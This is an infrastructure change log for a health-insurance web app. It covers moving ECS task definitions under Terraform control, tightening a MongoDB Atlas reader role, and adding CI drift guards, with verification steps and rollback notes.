Appearance
Infrastructure Change Log
Purpose: Timestamped record of every meaningful infrastructure change. SOC 2 CC8.1 (Change Management) and CMS EDE Phase 3 change-control evidence.
Conventions:
- Newest entries at the top.
- Every entry: ISO-8601 UTC timestamp, actor, change summary, affected resources/accounts, linked issue/PR/commit, rollback note if applicable.
- Cross-check against CloudTrail in the
askflorence-log-archiveaccount for the authoritative machine-readable record.
2026-05-13T10:30Z — ENG-277 PR 3: cleanup + ADR 0007 + deploy/rollback runbooks
Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr3-cleanup, PR against main); agent: Claude Opus 4.7 (1M context)
Linked: ENG-277 (PR 3 of 3 — final).
What shipped
Deletions (3 files, ~600 lines retired):
.github/workflows/atlas-task-def-drift.yml— ENG-272 Layer 5 nightly drift checker. No longer needed with Terraform owningcontainer_definitionsend-to-end.scripts/audit/atlas-task-def-drift.ts— the drift-checker script.scripts/ops/patch-task-def-add-secret.sh— the manual remediation helper.
Doc updates:
scripts/audit/generate-access-matrix-docs.ts— "Four CI guards" → "Three CI guards"; references ADR 0007.infra/atlas/access-matrix.ts— Layer 5 reference removed from CI-guard list.docs/infrastructure/atlas-access-matrix.md— regenerated vianpm run docs:atlas.docs/.vitepress/config.ts— ADR + Runbooks sidebars extended.docs/adr/index.md— 0007 added.
New docs:
docs/adr/0007-terraform-owns-ecs-task-def.md— Accepted ADR.docs/runbooks/deploy-via-terraform.md— operational runbook.docs/runbooks/rollback-via-terraform.md— rollback procedures.
Rollback
Pure revert. No live-state implications.
2026-05-13T10:00Z — ENG-277 PR 2: mirror Terraform-driven deploy to staging
Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-pr2-staging, PR against main); agent: Claude Opus 4.7 (1M context)
Linked: ENG-277 (PR 2 of 3). Follows ENG-277 PR 1 prod ship (2026-05-13T02:23Z) which retired the silent-secret-binding-drift bug class on prod. PR 2 brings staging onto the same pipeline.
Why
Prod has been stable on the Terraform-driven pipeline since 2026-05-13T07:08Z (deploy run 25784042404 + multiple successful subsequent deploys). The same structural fix needs to land on staging so the ENG-279-shape drift cannot recur there either. Staging-side IAM was preemptively wired during the ENG-308 / ENG-309 / ENG-313 chain — both envs already have parity on AssumeRoleBackend + TerraformRefreshReadOnly + DeploySecretsRead + ValidateSecretsRole.
What shipped
Three files touched (mechanical mirror of PR 1):
.github/workflows/deploy-staging.yml— deleted the 2-step legacy chain (Download current task definition+Update task definition with new image) and theDeploy to ECSstep. Inserted 5 new steps between the ensure-indexes block and the scale-to-1 step:hashicorp/setup-terraform@v3(terraform_version 1.14.0),terraform init,terraform validate,terraform apply -auto-approve -var app_image_uri=<ecr-uri>,timeout 600 aws ecs wait services-stable. The 10-min cap mirrors the legacywait-for-minutes: 10semantics. Ensure-indexes block (lines 110-194 post-edit) untouched.infra/envs/staging/ecs.tf— replaced hardcodedcontainer_image = "public.ecr.aws/docker/library/nginx:alpine"withcontainer_image = var.app_image_uri.infra/envs/staging/variables.tf(NEW) — declaresapp_image_urivariable with the same nginx placeholder default as prod's variables.tf.
Pre-work probe
Captured against live staging state + current live image SHA. Diff verified clean:
# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 1 to change, 1 to destroy.ECS task def "replace" is normal AWS provider behavior (immutable resource; registers new revision). No CloudFront / IAM / unrelated drift surfaced. Apply will succeed end-to-end because staging IAM has parity with prod (proven by the prod deploys that have run since ENG-308).
Verification
PR-time CI:
terraform fmt -check -recursive infra/envs/cleannpm run preflight -- --quick— all 4 checks PASS expected
Post-merge:
- Push
main→stagingbranch firesdeploy-staging.ymlautomatically - New workflow: build/push → ensure-indexes (legacy CLI path, unchanged) → Terraform init/validate/apply →
aws ecs wait services-stable(10 min cap) → ALB smoke → post-deploy smoke 11/11 PASS - Live staging task def shows new revision, image SHA matches,
secretCount = 16(all bindings present includingMONGODB_WRITE_URI+MONGODB_AUDIT_WRITE_URIwhich were the originally-drifted secrets on staging) https://stage.askflorence.health/api/healthreturns 200
Rollback
Same shape as PR 1's rollback:
- Apply fails: circuit breaker keeps service on old revision;
git revert <PR2>+ merge; investigate workflow log. - Apply succeeds but new task unhealthy:
aws ecs update-service --cluster askflorence-staging --service askflorence-staging-app --task-definition askflorence-staging-app-task:<old-N>; wait stable; revert. - Bad image: re-push to
stagingbranch with previous good SHA; same Terraform-owned pipeline rebuilds + applies known-good image. Fix forward.
2026-05-12T20:30Z — ENG-277 PR 1: drop lifecycle.ignore_changes = [container_definitions] on prod ECS task def; Terraform owns the whole task def via terraform apply -var app_image_uri=<sha>
Actor: taha.abbasi via ~/Developer/ask-florence-eng-277-terraform-owns-task-def/ worktree (branch eng-277-terraform-owns-task-def, PR against main); agent: Claude Opus 4.7 (1M context)
Linked: ENG-277 (Phase 2 / Option C structural fix); follow-up to ENG-272 (Layers 1-4, PR #150) and ENG-272 Layer 5 (PR #162); same bug class recurred 2026-05-11 (MONGODB_REFERENCE_URI) and 2026-05-12 (MONGODB_WRITE_URI + MONGODB_AUDIT_WRITE_URI on staging via ENG-279 PR #170). Prod-only change in PR 1. Staging stays on the legacy CI chain until PR 2 ships (24h after PR 1 deploy + soak — per the new universal prod-first deploy rule, staging is the YC demo link and cannot regress).
Why
The ECS app module pins lifecycle.ignore_changes = [container_definitions] so CI can register new task-def revisions on each deploy without Terraform fighting it. The block is all-or-nothing on the JSON-encoded container_definitions attribute — when Terraform source adds a new secrets[] or environment[] entry, Terraform silently stops tracking it, and the deploy workflow's describe-task-definition → render-task-definition chain only swaps the image. The new binding never lands on the running task.
Recurrences in the last ten days:
- 2026-05-11 (ENG-272):
MONGODB_REFERENCE_URImissing on staging → "Tyler Wood not covered" wrong on the YC application surface. - 2026-05-12 (ENG-279):
MONGODB_WRITE_URI+MONGODB_AUDIT_WRITE_URImissing on staging task def revision 75 →POST /api/waitlist500 on the YC link smoke; manual remediation viascripts/ops/patch-task-def-add-secret.shregistered revision 77. - ENG-249 + ENG-271 earlier (resume token, scheduler vars).
Pattern interval: ~24 hours. ENG-284 (PR #171) doubled down on detection (Phase-1 write-path smoke + 3 PR-time guards, including ecs-task-def-coverage). Detection layers do their jobs but can't prevent regressions that ship between checkpoints. ENG-277 retires the bug class by structural change: Terraform owns the task definition end-to-end, and the deploy workflow drives it via -var app_image_uri=<sha>.
What shipped (PR 1 — prod only)
Five files touched:
infra/modules/ecs-service/main.tf— deleted thelifecycle { ignore_changes = [container_definitions] }block onaws_ecs_task_definition.this. Shrankaws_ecs_service.thisignore_changesfrom[desired_count, task_definition]→[desired_count](keptdesired_countso the workflow's first-deploy 0→2 scaling step doesn't fight Terraform). Inlineterraform fmtcanonicalized pre-existing alignment in thelocals { }block + theKmsDecryptForSecretsSid (whitespace only, no semantic change).infra/envs/prod/ecs.tf— replaced hardcodedcontainer_image = "public.ecr.aws/docker/library/nginx:alpine"withcontainer_image = var.app_image_uri. Comment block updated to explain Terraform now owns the image lifecycle.infra/envs/prod/variables.tf(NEW) — declaresvariable "app_image_uri"withdefault = "public.ecr.aws/docker/library/nginx:alpine"(same placeholder; preserves no-argterraform applybehavior for engineers modifying networking, KMS, etc.).infra/envs/prod/github-oidc.tf— addedSid = "AssumeRoleBackend"statement grantingsts:AssumeRoleonarn:aws:iam::778477254880:role/TerraformBackendRole. This is the critical IAM gap the pre-work probe surfaced — the backend config inversions.tfdeclaresassume_role { role_arn = "TerraformBackendRole" }, but the prod OIDC role's inline policy had direct S3/DDB/KMS perms on mgmt-account state resources WITHOUT theAssumeRolestatement. Latent because the current deploy workflow doesn't run Terraform; surfaces immediately when PR 1 adds the Terraform apply step. Mirrored to staging in PR 2..github/workflows/deploy-prod.yml— deleted the 3-step legacy chain (Download current task definition,Update task definition with new image,Deploy to ECS). Inserted 4 new steps between the ensure-indexes block and the scale-to-2 step:hashicorp/setup-terraform@v3pinnedterraform_version: 1.14.0,terraform_wrapper: falseterraform init -input=falseininfra/envs/prodterraform validateterraform apply -auto-approve -input=false -var "app_image_uri=$IMAGE_URI"(where the GitHub Actions step references the build output via the standardsteps.build-image.outputs.image-uriexpression)timeout 900 aws ecs wait services-stable— mirrors the legacywait-for-service-stability: true, wait-for-minutes: 15behavior the removedamazon-ecs-deploy-task-definitionstep provided.
The ensure-indexes pre-deploy block (lines 105-189 post-edit) is kept verbatim on the legacy
register-task-definition+run-taskCLI path; it still has its ownlifecycle.ignore_changes = [container_definitions]ininfra/modules/ecs-ensure-indexes/main.tf. Different blast radius (one-shot pre-deploy task, exits non-zero on failure aborting the deploy with the old service-tied task def still active) and explicit out of scope for ENG-277. Tracked as a symmetric follow-up.The ENG-284 smoke expansion (lines 289-330 post-edit:
Setup Node,Install smoke deps,Fetch smoke secrets,Post-deploy smoke) is preserved unchanged.
No staging changes in PR 1. .github/workflows/deploy-staging.yml, infra/envs/staging/ecs.tf, and the staging OIDC policy are untouched. Staging continues to use the legacy CI chain (describe-task-definition → render-task-definition → deploy-task-definition) until PR 2 ships after the 24h prod soak gate.
Pre-work terraform plan probe (local SSO, no commits, no apply)
Probe shape captured against live prod state with module changes applied locally and current live image SHA passed as -var. Confirmed the diff before opening PR 1.
# aws_iam_role_policy.github_actions_deploy will be updated in-place
# module.ecs_app.aws_ecs_service.this will be updated in-place
# module.ecs_app.aws_ecs_task_definition.this must be replaced
Plan: 1 to add, 2 to change, 1 to destroy.- IAM policy update — adds the
AssumeRoleBackendSid. - ECS service update —
task_definitionARN swaps from live:75→(known after apply). - ECS task def "replace" — normal AWS provider behavior for an immutable resource. Terraform registers a new revision (76+) with the new image AND the full Terraform-source content, then deregisters the state-tracked revision 1 (the bootstrap). Live revisions 2-75 remain INACTIVE for rollback safety. Service
deployment_circuit_breaker { enable = true, rollback = true }handles the rolling deployment with auto-rollback on health failure.
Drift finding from the probe: MONGODB_AUDIT_WRITE_URI is declared in Terraform source (infra/envs/prod/ecs.tf) but was missing from live prod task def revision 75 — same shape as ENG-279's staging drift, but on prod (latent; no current code path reads it on prod, so no user-facing impact yet). PR 1's first apply silently fixes the drift by landing the binding on the new revision.
Verification gates
PR-time CI:
atlas-access-matrix-guard.yml— passes (no Mongo URI source changes).ecs-task-def-coverage.yml(ENG-284) — passes (no secret bindings added/removed).build-check.yml(ENG-284) — passes (no app code changes).validate-secrets.yml— passes.
Post-merge prod deploy (via gh workflow run deploy-prod.yml --ref main):
- Build + push image to
039624954211.dkr.ecr.us-east-1.amazonaws.com/askflorence-app:<sha>. - Ensure-indexes runs (legacy CLI path, unchanged).
- NEW: Setup Terraform 1.14.0 →
terraform init(assumesTerraformBackendRolevia the new OIDC Sid) →terraform validate→terraform apply -auto-approve -var app_image_uri=.... Apply registers task def revision 76 (or higher) with full source content; updates servicetask_definitionto the new ARN. aws ecs wait services-stable --cluster askflorence-prod --services askflorence-prod-appreturns within 15 min (typically 3-8 min for 2 tasks).- ALB smoke against
origin.askflorence.health/api/health— 200. npx tsx scripts/audit/post-deploy-smoke.ts— 11 checks (read-only 6 + ENG-284 write-path 5) PASS.- Manual eyeball:
aws ecs describe-task-definition --task-definition askflorence-prod-app-task --query 'taskDefinition.{revision:revision,image:containerDefinitions[0].image,envVarCount:length(containerDefinitions[0].environment),secretCount:length(containerDefinitions[0].secrets)}'— revision N+1, image SHA matches commit, env count matches Terraform source, secret count = 16 (was 15 live on revision 75; the addition isMONGODB_AUDIT_WRITE_URI). - Full member + agent smoke flows against
https://askflorence.health(CLAUDE.md procedures; synthetic emailstaha+smoke-{plan-interest,agent}[email protected]; cleanup against prod Atlas + HubSpot portal 246003491).
Rollback
Three scenarios:
- Apply fails mid-flight (e.g. IAM gap, plan diverges from probe): circuit breaker keeps service on revision 75;
git revert <PR1 commit>; merge revert PR; investigate workflow log. - Apply succeeds but new task unhealthy (circuit breaker DIDN'T catch the issue):
aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --task-definition askflorence-prod-app-task:75; wait stable; revert. - Bad image (build passes, runtime errors): re-dispatch
deploy-prod.ymlwithref= previous good SHA; same Terraform-owned pipeline rebuilds + applies a known-good image. Fix forward, no revert.
Soak gate
24h before PR 2 (staging) may merge. Monitor aws logs tail /aws/ecs/askflorence-prod-app --since 1h --format short at 1h / 4h / 12h / 24h. runningCount == desiredCount == 2 must hold. Hit /api/health and /api/eligibility hourly.
Out-of-scope follow-up
infra/modules/ecs-ensure-indexes/main.tf lines 179-181 still have lifecycle { ignore_changes = [container_definitions] }. Same bug class but different exposure (one-shot pre-deploy task with visible non-zero exit). Symmetric follow-up to file as a separate issue after PR 3 lands.
2026-05-11 — ENG-257 re-baseline: role_reader_reference 4-collection scope accepted as permanent (won't-fix)
Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/eager-dirac-acdd3e/ worktree (branch claude/eager-dirac-acdd3e, doc-hygiene PR against main); agent: Claude Sonnet 4.5
Linked: ENG-257 closed as not planned; GH #122 closed; GH #120 closeout comment cross-linked; ADR 0004 amendment 2026-05-11. No Atlas changes. No CI changes. No deploys.
Why
role_reader_reference was widened from 2 → 4 collections on 2026-05-09 to support the §1311 re-validation audit (ENG-230). ENG-257 was filed as the planned narrow-back once the audit cycle shipped. ENG-230 closed 2026-05-09. Re-examining the architecture on 2026-05-11: the wider scope is the role's actual permanent purpose, not a temporary tradeoff. All four collections are part of the §1311 / MRF reference dataset (same data classification, same network path); audit re-validation is a recurring responsibility (ENG-231 refresh cadence is open and will exercise the same access path). Narrow-then-re-widen on every future audit cycle is operational churn with zero posture benefit. Re-baseline the documentary framing to agree with the live role's responsibility.
What shipped
This is pure doc + comment hygiene. The Atlas role state, the matrix collections array, and every CI guard are unchanged. The only deltas are explanatory:
infra/atlas/access-matrix.ts— replaced the 7-line// TEMPORARY (added 2026-05-09 — narrow back ...)comment block above theplans+mrpuf_issuers_stagingentries with a permanent justification comment.src/lib/db.ts— same treatment on the parallel block inSTAGING_REFERENCE_READ_COLLECTIONS.docs/adr/0004-cross-cluster-atlas-privatelink.md— appended "Amendment 2026-05-11 (ENG-257 closeout)" section explaining the 4-collection canonical scope and why.docs/runbooks/atlas-user-provisioning.md— updated Step B'satlas customDbRoles create role_reader_referenceexample to use the 4-collection canonical scope; updated the prose paragraph to reflect the role's two-purpose responsibility (runtime tier-fallback + audit re-validation).docs/infrastructure/change-log.md— this entry.
Verification
npx tsc --noEmit— clean (no source changes other than a comment block).npx tsx scripts/audit/access-matrix-env-coverage.ts— pass (no env-var bindings shifted).npx tsx scripts/audit/access-matrix-doc-sync.ts— pass (doc cross-refs unchanged).- Nightly drift check (
scripts/audit/staging-cluster-drift.ts) — already green since 2026-05-09 (matrix matches Atlas state); confirmed unchanged. - Post-merge smoke (
/api/drugs/covered,/api/providers/covered) — runs on the existingDeploy prodworkflow without modification; will pass because no live state changes.
Rollback
Comment-only PR has no live-system rollback. If a future cycle wants to re-narrow to 2 collections + provision a dedicated audit_reader user, the original recipe is preserved in GH #122's description and in this change-log's prior entry (2026-05-09T06:18Z).
2026-05-09T06:18Z — CI guard Phase 2 shipped (live nightly drift check) + cross-cluster reader role tightened to per-collection scoping
Actor: taha.abbasi via ~/Developer/askflorence/.claude/worktrees/practical-ride-fa5b6f/ worktree (branch claude/practical-ride-fa5b6f, will push to origin/ci-guard-phase-2); agent: Claude Opus 4.7 (1M context)
Linked: #100 / ENG-239 Phase 2 of 2 (Phase 1 shipped 2026-05-08T04:18Z entry below); ADR 0004 Consequences section updated; brief at docs/briefs/overnight-ci-guard-phase-2.md. No deploys — branch-only ship per brief constraints (cron-scheduled audit workflow, not PR-gated).
Why
Phase 1 (static guard, shipped 2026-05-08) catches code-level drift — every PR is rejected if it adds a getReferenceDb() call against a non-allow-listed collection. Phase 1 does NOT catch runtime drift: someone connecting to staging Atlas via mongosh and creating a PHI collection by hand; an out-of-band ingest writing a sensitive collection; a privilege expansion via Atlas Admin UI on the cross-cluster app_read_staging user. Phase 2 closes that gap by inspecting the actual Atlas state nightly and flagging drift as a P1 GitHub issue.
A pre-existing follow-up from the Phase 11 runbook (docs/runbooks/atlas-user-provisioning.md line 200) — "if a future audit requires per-collection scoping, replace this with a custom role role_reader_reference with [email protected]_staging,[email protected]_staging" — was the natural way to give Phase 2's audit something specific to verify. Tightening + audit ship as one coherent unit.
What shipped
Atlas state changes (staging project 69e31af12fd2c0aef51bbb41):
- Created custom role
role_reader_referencewithFINDaction onaskflorence.formularies_staging+askflorence.providers_stagingONLY. No other actions, no inheritedRoles. - Swapped
app_read_staginguser from built-inread@askflorence(whole-DB scope) →role_reader_reference@admin(per-collection scope). Atlas applied without restart; ~30s propagation.
Code (worktree branch claude/practical-ride-fa5b6f):
src/lib/db.ts— addedSTAGING_REFERENCE_READ_COLLECTIONSconstant (formularies_staging+providers_staging). Distinct fromSTAGING_ALLOWED_COLLECTIONS(10 items, "what's allowed to live on the staging cluster");STAGING_REFERENCE_READ_COLLECTIONSis "what the cross-cluster consumer actually reads." Two lists serve different security purposes.scripts/audit/staging-cluster-drift.ts(NEW) — TypeScript audit script wrapping atlas CLI subprocess (no Atlas Admin API HTTP Digest re-implementation needed; atlas CLI handles auth viaMONGODB_ATLAS_PUBLIC_API_KEY+MONGODB_ATLAS_PRIVATE_API_KEYenv vars in CI, falls back toatlas auth loginconfig locally). Validates 10 violation categories: user_missing / user_role_count / user_role_name / user_role_database / role_missing / role_inherited / role_action / role_resource_db / role_resource_cluster_scope / role_collection_extra / role_collection_missing. Exit 0 + ✅ PASS on canonical state; exit 1 + ❌ FAIL with per-violation report on drift. Defense-in-depth: locally duplicates the expected-collections set so a developer can't widen the contract by editing onlydb.ts..github/workflows/staging-cluster-drift.yml(NEW) — cron0 8 * * *(08:00 UTC daily) + manualworkflow_dispatch. Installs MongoDB Atlas CLI on the runner, bindsATLAS_DRIFT_CHECK_PUBLIC_KEY+ATLAS_DRIFT_CHECK_PRIVATE_KEYrepo secrets to the canonicalMONGODB_ATLAS_*_API_KEYenv-var names atlas CLI consumes automatically, runs the script. Onfailure():actions/github-script@v7opens a P1 GitHub issue (labelscompliance+priority-1) titled[Drift] Staging cluster role drift detected — YYYY-MM-DDlinking to the workflow run + ADR 0004 + the runbook.permissions: { contents: read, issues: write }. Intentionally NOT triggered on PR/push — Phase 1 covers code-time drift; this is a separate axis (live cluster state).
Documentation (5 files updated):
docs/runbooks/atlas-user-provisioning.md— Step B updated to provision the user withrole_reader_reference@admin(instead ofread@askflorence); rationale + emergency-rollback snippet added. New Step H — API key for nightly drift check (Phase 2): provisioning recipe,gh secret setcommands, rotation cadence, drift-check rollback.docs/security-compliance/soc2-control-mapping.md(then atdocs/compliance/soc2/controls.mdbefore the 2026-05-11 doc consolidation) — extended CC7.2 with new row for the live nightly check (verification + 3 synthetic violations); extended CC8.1 with new row for the role-tightening change-management posture.docs/adr/0004-cross-cluster-atlas-privatelink.md— Consequences section restructured to mark both phases shipped + describe the audit posture.docs/infrastructure/data-classification.md— Drift guard section restructured to mark Phase 2 shipped.docs/decisions/2026-05-03-pivot-cms-api-direct.md— open-mitigations item rewritten to mark Phase 2 shipped.
No infrastructure changes (AWS, Terraform, ECS). No code paths in src/app/, src/components/, src/lib/ other than the new constant. No prod deploys. No Vercel deploys. No staging deploys. Branch-only ship per brief constraints; the audit workflow runs on cron (08:00 UTC daily) once the GH secrets are provisioned.
Verification
Pre-tighten baseline (apex + stage):
POST askflorence.health/api/drugs/covered{rxcuis:["1364441"], plan_id:"42261UT0060023", year:2026}→coverage=Covered, drug_tier=PreferredBrand, prior_authorization=false, quantity_limit=true, step_therapy=false. HTTP 200.POST askflorence.health/api/providers/covered{npis:["1023023066"], plan_id:["42261UT0060023","42261UT0060026"], year:2026}→ bothcoverage=Covered, network_tier=Preferred. HTTP 200.POST stage.askflorence.health/api/drugs/covered(same body) → identical response. HTTP 200.POST stage.askflorence.health/api/providers/covered(same body) → identical response. HTTP 200.
Post-tighten (60s after role swap): all 4 responses byte-identical to baseline. Cross-cluster path on prod still healthy with the narrower role; intra-cluster path on stage unaffected (uses mongodb/app-read user, not app_read_staging).
Drift script local run (via worktree's npx tsx scripts/audit/staging-cluster-drift.ts):
- Canonical state: ✅ PASS, exit 0.
- Synthetic violation A (extra collection —
--append --privilege [email protected]_audit_log): ❌ FAIL, exit 1, categoryrole_collection_extraflaggingagent_audit_log. Reverted; clean state restored. - Synthetic violation B (wider action —
--append --privilege [email protected]_staging): ❌ FAIL, exit 1, categoryrole_actionflaggingINSERT. Reverted; clean state restored. - Synthetic violation C (extra role on user —
--role role_reader_reference@admin --role read@admin): ❌ FAIL, exit 1, two categories —user_role_count(2 roles vs expected 1) +user_role_name(extraread@admin). Reverted; clean state restored.
Final state confirmation: drift script ✅ PASS; app_read_staging has exactly role_reader_reference@admin; role_reader_reference has exactly [email protected]_staging + [email protected]_staging; final apex smoke (drugs + providers) returns canonical responses.
TypeScript: npx tsc --noEmit clean for files touched in this session (src/lib/db.ts + scripts/audit/staging-cluster-drift.ts); pre-existing unrelated errors in scripts/hubspot/* + src/lib/hubspot/* (missing @hubspot/api-client module typing) untouched and unaffected.
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC7.2 (additional row) — detection of runtime privilege drift on cross-cluster reader | New row in docs/compliance/soc2/controls.md. Live nightly audit catches privilege drift the static guard cannot — Atlas Admin UI changes, out-of-band scripts, role escalation. |
| SOC 2 | CC8.1 (additional row) — change management for cross-cluster reader role privileges | New row. Role tightened to per-collection custom role; constants duplicated between source-of-truth and audit script (defense-in-depth); quarterly review cadence aligned with STAGING_ALLOWED_COLLECTIONS. |
| HIPAA | §164.312(a)(1) Access Control + §164.308(a)(4) Information Access Management | Reinforced via principle of least privilege — cross-cluster reader can no longer see anything in the askflorence DB beyond the 2 collections it actually consumes. |
| EDE Phase 3 | Environment separation | Reinforced — the runtime audit closes the gap left by code-only enforcement. |
Open prerequisites (before nightly cron starts passing)
- GH secrets
ATLAS_DRIFT_CHECK_PUBLIC_KEY+ATLAS_DRIFT_CHECK_PRIVATE_KEYneed to be provisioned before the next 08:00 UTC tick. Taha to create the Atlas Programmatic Key (Org Owner role required) scoped toProject Read Onlyon the staging project (NOT Org-level). Workflow ships ready to consume those secrets; first cron run will fail open (no secrets → atlas CLI auth error) until they land. Manualgh workflow run staging-cluster-drift.yml --ref ci-guard-phase-2after provisioning to verify.
Cost outcome
Unchanged. CI minutes negligible (drift workflow runs once daily, completes in <1 min). No new AWS resources, no Atlas tier changes.
Outstanding follow-ups
- GH secret provisioning (above) — blocks first green nightly run.
- Quarterly review of
STAGING_REFERENCE_READ_COLLECTIONSalongsideSTAGING_ALLOWED_COLLECTIONSperdocs/security-compliance/vendor-register.mdcadence — both must move in lock-step with role updates on Atlas. - Annual rotation of the
gh-actions-staging-drift-checkAtlas API key — first rotation due 2027-05-09.
2026-05-09T04:18Z — Phase D provider-network fallback shipped + facility/pharmacy autocomplete fix + CI guard Phase 1 (static check)
Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context)
Linked: #96 / ENG-234 Phase D shipped + closed; #100 / ENG-239 CI guard Phase 1 of 2; #106 / ENG-245 (NEW) pharmacy network lookup; #107 (NEW) drug coverage checker product idea; #108 (NEW) clear-all button. Closed: GH #17, #18, #20. Commits: 1465c6d (Phase D + autocomplete), 40a4a3a (diagnostic), 67cb315 (CI guard); Deploy run 25590973086 success in 6m43s, ECS revision 54.
Why
Phase 11 (yesterday's commit) wired the cross-cluster Atlas PrivateLink read path from prod to staging cluster, with drug-tier-fallback for formularies_staging. The provider mirror (providers_staging reads via the same path) was the missing other half — Phase D. Same architecture, different collection. Plus while verifying, found that the doctor-search UI hook hardcoded type: "Individual" so retail pharmacies (Walmart, Walgreens) silently filtered out — fixed alongside.
The CI guard came out of Phase 11's open-mitigations list: the staging cluster must stay non-PHI for the data-classification argument to hold (SOC 2 CC6.6 + EDE Phase 3 segregation). A future PR adding a cross-cluster read against a PHI-class collection would silently break that posture; we needed enforcement at build time.
What shipped
Code (commits 1465c6d + 67cb315):
src/lib/provider-network-fallback.ts(NEW) —lookupStagingProviderNetworks(npiPlanPairs)mirroringdrug-tier-fallback.ts. Readsproviders_stagingviagetReferenceDb(); returns Map of${npi}|${plan_id}→network_tier. CMS coverage authoritative; staging fills the tier-omission gap.src/app/api/providers/covered/route.ts— enrichment loop wired after CMS call (mirrors/api/drugs/covered).src/app/api/providers/autocomplete/route.ts— server-side fan-out across Individual + Facility + Group whentypeis omitted or"All". Backwards-compatible: callers passing a specific type get the prior single-type behavior.src/lib/hooks/use-doctor-autocomplete.ts—ProviderTypeunion extended to include"Group"+"All"; default changed"Individual"→"All".src/components/plans/CoveragePanel.tsx+src/components/plans/detail/PlanCoverageCheck.tsx— passtype: "All"with explanatory comment.src/lib/db.ts— newSTAGING_ALLOWED_COLLECTIONSconstant (10 collections) +StagingAllowedCollectiontype. Source of truth for cross-cluster data-classification allow-list.scripts/audit/staging-collections-guard.ts(NEW) — zero-dep regex-based static guard. Walkssrc/+scripts/, finds everyawait getReferenceDb()binding + downstream.collection("…")calls, verifies against allow-list. Self-skip + comment-stripping defenses. Allow-list duplicated in script (defense-in-depth)..github/workflows/staging-collections-guard.yml(NEW) — runs on PRs tomain/staging/doctor-rx-flow+ on push tomain+ on demand. Clear::error::output on failure with ADR 0004 pointer.scripts/diag/check-walgreens-coverage.js(NEW, commit40a4a3a) — diagnostic script that surfaced the pharmacy-network finding (medical services vs pharmacy network are separate data layers).
No infrastructure changes — all reads ride on the Phase 11 cross-cluster path established yesterday. No new AWS resources, no new Atlas resources.
Verification
Phase D end-to-end on prod:
POST askflorence.health/api/providers/coveredwith Walgreens NPI1023023066against issuer 42261's UT plans42261UT0060023+42261UT0060026: returnedcoverage=Covered, network_tier="Preferred". Thenetwork_tierfield is only populated bylookupStagingProviderNetworks()reading fromproviders_stagingvia the cross-cluster path. CMS returnedCoveredwithout tier; staging filled it. Sub-second latency on the AWS-backbone path.
Walmart/Walgreens autocomplete fan-out on prod:
POST askflorence.health/api/providers/autocomplete{"q":"Walmart","zipcode":"84094"}(notype): 13 results merging Facility (WALMART INC.NPIs) + Group (SLC WALMART EYE DOCS).- Same for Walgreens: 21 results merging Individual (
SARAH WALGREEN— actual person named Walgreen) + Facility (WALGREENS #XXXXX).
CI guard static check:
- Workflow run 25591499570 triggered automatically on first push to
main— success in 42s. - Synthetic positive test: dropped temporary file under
scripts/db/with 3 known-bad patterns (string literal access toagent_audit_log, dynamic collection name, inline(await getReferenceDb()).collection("members")). All 3 caught with correct file:line + reason classification (not_on_allow_list/dynamic_name). Exit code 1 as expected. - Cleanup: removed synthetic file → guard returned to ✅ PASS, exit 0. No false-positive lingering in clean state.
ECS state post-deploy: task def revision 54, 2/2 tasks running, rolloutState=COMPLETED.
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC7.2 (additional row) — detection of unauthorized cross-cluster data-flow scope | New row in docs/compliance/soc2/controls.md. Static guard catches PHI-class collection introduction at PR time. |
| SOC 2 | CC8.1 — change management for non-prod-isolation invariants | New CC8.1 row. Cross-cluster scope changes can't merge without explicit allow-list expansion. Quarterly review cadence per vendor register. |
| SOC 2 | CC8.1 — change management (existing posture) | Phase D + Walmart fix landed via standard PR + commit + CI + Deploy prod workflow chain — full evidence trail in commit messages + this change-log + the session log. |
| HIPAA | §164.312(e)(1) Transmission Security | Unchanged from Phase 11; cross-cluster path stays TLS + AWS-backbone-only. |
| EDE Phase 3 | Environment separation | Reinforced — CI guard now algorithmically enforces what was previously hand-discipline. |
Pharmacy-network gap surfaced + filed separately
While verifying Phase D, found that retail pharmacy NPIs in providers_staging represent the medical services those pharmacies provide (vaccinations, screenings, in-store retail clinics) — NOT pharmacy-network membership for prescription dispensing. Confirmed by reading SelectHealth's published §1311 index.json directly: provider file lists medical providers only; pharmacy network lives at separate RxEOB SPA tool.
Filed as #106 / ENG-245 with two-part scope: Part A UX clarity (this cycle, due 2026-05-15) + Part B pharmacy-network data ingest (multi-week). Diagnostic at scripts/diag/check-walgreens-coverage.js is the evidence base.
Cost outcome
Unchanged from Phase 11 (~$438/mo total: $56 prod M10 + $382 staging M30). Phase D + CI guard add zero recurring cost (CI minutes negligible).
Outstanding follow-ups
- CI guard Phase 2 (live nightly drift check) — sub-task on #100 / ENG-239. Open design question: live check should verify role-based permissions on
app_read_staging(Atlas API call), not just collection enumeration (would false-positive on staging-app data legitimately on the cluster). - #106 / ENG-245 — Pharmacy network lookup Part A (UX) due 2026-05-15.
- #92 / ENG-230 — Re-validate §1311 audit at 100% match (cycle 1, due 2026-05-11).
- Other cycle-1 items per Linear: ENG-227, ENG-228, ENG-231, ENG-232, ENG-233, ENG-236.
Rollback
bash
# Code rollback (any of the three commits):
git revert 67cb315 # CI guard
git revert 1465c6d # Phase D + autocomplete fix
git revert 40a4a3a # Diagnostic script
git push origin main
# Infrastructure: no changes to roll back. All work was application-layer.
# CI guard temporary disable (if it produces unexpected failures):
# Edit .github/workflows/staging-collections-guard.yml — comment out the
# `npx tsx scripts/audit/staging-collections-guard.ts` step. Do NOT delete
# the workflow file (history matters for SOC 2 CC8.1 evidence).2026-05-09T01:08Z — Phase 11 cross-cluster Atlas reads from prod via AWS PrivateLink
